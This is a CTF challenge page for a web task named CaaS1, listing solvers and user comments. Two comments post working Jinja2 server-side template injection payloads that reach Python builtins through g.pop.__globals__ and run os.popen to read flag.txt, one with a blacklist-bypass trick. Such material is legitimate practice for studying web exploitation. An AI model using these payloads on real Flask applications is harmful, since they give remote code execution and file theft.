CaaS1WEB 未解决
分数:
40
金币:
4
题目作者:
Aman
一 血:
Paradiso
一血奖励:
4金币
解 决:
55
提 示:
描 述:
CaaS1
其 他:
server.zip
评分(1)
解题动态

bugkuctfmike6 攻破了该题 9天前

caterpie771 攻破了该题 12天前

124要留就要77 攻破了该题 14天前

The-Beacon 攻破了该题 26天前

lzq2000 攻破了该题 26天前

SUSAN777 攻破了该题 1月前

yht111 攻破了该题 1月前

gaohaofeng 攻破了该题 1月前

a5580990 攻破了该题 1月前

TKar0 攻破了该题 1月前

llc123 攻破了该题 1月前

18075013015 攻破了该题 2月前

xiaocai111 攻破了该题 2月前

tingsi464 攻破了该题 2月前

tfios 攻破了该题 3月前

s19n@l 攻破了该题 3月前

c2F1eQ 攻破了该题 3月前


Rannnn 攻破了该题 4月前

无122 攻破了该题 5月前

评论
124要留就要77 14天前
举报
name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag
baozongwi 7月前
举报
会不会出题大哥,这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事
网络小钦 1年前
举报
看不懂啊
2552758573 1年前
举报
payload太长了,绕不过去
沐沐 2年前
举报
这个题什么意思
沐沐 1年前
举报
@cgxx 懂了 好玩这个题
cgxx 1年前
举报
模板注入